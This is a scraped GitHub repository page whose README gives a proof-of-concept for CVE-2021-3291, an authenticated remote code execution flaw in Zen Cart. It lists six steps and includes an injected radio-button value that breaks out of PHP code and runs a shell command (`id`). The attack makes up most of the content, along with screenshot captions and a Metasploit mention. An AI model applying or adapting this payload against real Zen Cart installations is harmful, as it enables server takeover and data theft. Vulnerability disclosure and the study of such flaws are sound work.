Skip to content

MucahitSaratar/zencart_auth_rce_poc

master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
 
 

zencart_auth_rce_poc CVE-2021-3291

1-) login as admin

2-) get any modules edit page

3-) inspect element any true radiobox

4-) change true to true','MODULE_ORDER_TOTAL_TOTAL_STATUS'); echo `id`; //

5-) click update

6-) to trig command go again edit page

CVE-2021-3291 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3291

POC

exploiting send command refresh page refresh page zoom

zoom

Metasploit

Ekran görüntüsü 2021-01-27 00-03-55

GIF

kanit

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published